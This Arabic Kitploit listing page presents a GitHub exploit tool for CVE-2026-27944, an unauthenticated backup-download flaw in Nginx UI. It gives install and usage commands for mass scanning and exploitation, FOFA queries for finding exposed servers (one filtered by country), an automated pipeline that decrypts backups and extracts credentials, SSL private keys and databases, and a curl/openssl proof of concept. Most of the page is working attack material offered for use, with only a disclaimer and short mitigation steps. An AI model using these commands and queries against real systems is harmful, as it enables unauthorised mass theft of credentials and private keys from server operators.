Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Cve-2026-27944-Tools-Exploit — Suka suka lah | Kitploit
أدوات/GitHubGitHub/bimabalance/cve-2026-27944-tools-exploit
الاستطلاعأدوات التشفير/فك التشفيرهجمات كلمات المرورتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلومات
GitHubbimabalance/cve-2026-27944-tools-exploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

Cve-2026-27944-Tools-Exploit

Suka suka lah

عرض المستودع
1منذ شهر واحدلم تتم المراجعة بعد

🚀 CVE-2026-27944: ثغرة استغلال النسخ الاحتياطي غير الموثوق في Nginx UI

📌 الوصف

27944.py هي أداة استغلال لـ CVE-2026-27944 تسمح للمهاجم بتنزيل وفك تشفير النسخ الاحتياطي لـ Nginx UI دون مصادقة.

توجد هذه الثغرة في إصدارات Nginx UI الأقدم من 2.3.2 وتسمح بالوصول إلى:

· بيانات اعتماد المستخدم ورموز الجلسة · مفاتيح SSL الخاصة · إعدادات Nginx · ملفات قاعدة البيانات

🔧 الميزات

· ✅ مسح ضوئي جماعي من ملف الهدف · ✅ استغلال هدف واحد · ✅ تنزيل تلقائي للنسخ الاحتياطي · ✅ فك تشفير تلقائي لـ AES-256-CBC · ✅ استخراج تلقائي لبيانات الاعتماد من النسخ الاحتياطي

🛠️ طريقة التثبيت

root@kitploit:~
git clone https://github.com/bimabalance/CVE-2026-27944.git
cd CVE-2026-27944
pip install -r requirements.txt

🚀 طريقة الاستخدام

  1. المسح الجماعي
root@kitploit:~
python 27944.py -f targets.txt -o hasil_scan
  1. استغلال هدف واحد
root@kitploit:~
python 27944.py -t target.com:9000 --exploit --decrypt
  1. الاستغلال الكامل
root@kitploit:~
python 27944.py -f targets.txt --exploit --decrypt -o hasil_full

📋 تنسيق ملف الأهداف

root@kitploit:~
target1.com:9000
192.168.1.1:9000
target2.com:8080

🎯 استعلام FOFA

root@kitploit:~
title="Nginx UI"
icon_hash="-1565173320"
header="X-Backup-Security"
body="Nginx UI" && port="9000"
title="Nginx UI" && country="ID"

📂 مخرجات النتائج

root@kitploit:~
results/
├── results.json
├── target_backup.bin
├── target_backup_decrypted.zip
└── target_extracted/
    ├── app.ini
    ├── database.db
    ├── nginx.conf
    └── ssl/

⚠️ إخلاء مسؤولية

هذه الأداة أُنشئت لأغراض تعليمية واختبارات أمنية أخلاقية. الكاتب غير مسؤول عن أي إساءة استخدام لهذه الأداة. استخدمها فقط على الأنظمة التي تملكها أو لديك إذن كتابي لاختبارها.

📝 شرح تقني

CVE-2026-27944 هي ثغرة حرجة في Nginx UI تسمح للمهاجم بالوصول إلى نقطة النهاية /api/backup دون مصادقة. تحتوي النسخ الاحتياطية على بيانات حساسة مشفرة بـ AES-256، ولكن يتم إرسال المفتاح (key) ومتجه التهيئة (IV) عبر رأس X-Backup-Security بتنسيق Base64.

درجة CVSS: 9.8 (حرجة)

الإصدارات المتأثرة: Nginx UI < 2.3.2

التخفيف:

  1. الترقية إلى Nginx UI v2.3.3
  2. حظر الوصول إلى /api/backup
  3. تدوير جميع بيانات الاعتماد

💀 إثبات المفهوم (POC)

root@kitploit:~
# التحقق من وجود الثغرة
curl -I http://target:9000/api/backup

# تنزيل النسخة الاحتياطية
curl -s http://target:9000/api/backup -o backup.bin

# فك تشفير النسخة الاحتياطية (يدويًا)
openssl enc -d -aes-256-cbc -base64 -K <key> -iv <iv> -in backup.bin -out backup_decrypted.zip
تنزيل الأداة